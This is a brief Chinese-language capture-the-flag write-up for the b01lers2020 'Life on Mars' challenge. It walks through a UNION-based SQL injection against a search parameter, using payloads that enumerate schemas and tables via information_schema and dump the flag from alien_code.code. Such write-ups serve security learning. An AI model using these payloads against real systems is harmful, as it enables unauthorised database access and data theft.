[b01lers2020]Life on Mars 一个接口的sql schema.schemate表

这里还是很简单的

啥也没有

然后抓包看看

发现传递参数 直接尝试sql

然后如果正确就会返回值 否则 返回1

chryse_planitia union select database(),version()

发现回显 直接开始注入

chryse_planitia union select database(),version()


chryse_planitia union select database(),group_concat(table_name) from information_schema.tables where table_schema="aliens"

?太多了 不切实际一个一个查 看看有没有其他数据库

chryse_planitia union select database(),group_concat(schema_name) from information_schema.schemata

然后就是正常的注入

最后查值的时候

from alien_code.code 即可

/query?search=amazonis_planitia union select 1,group_concat(code) from alien_code.code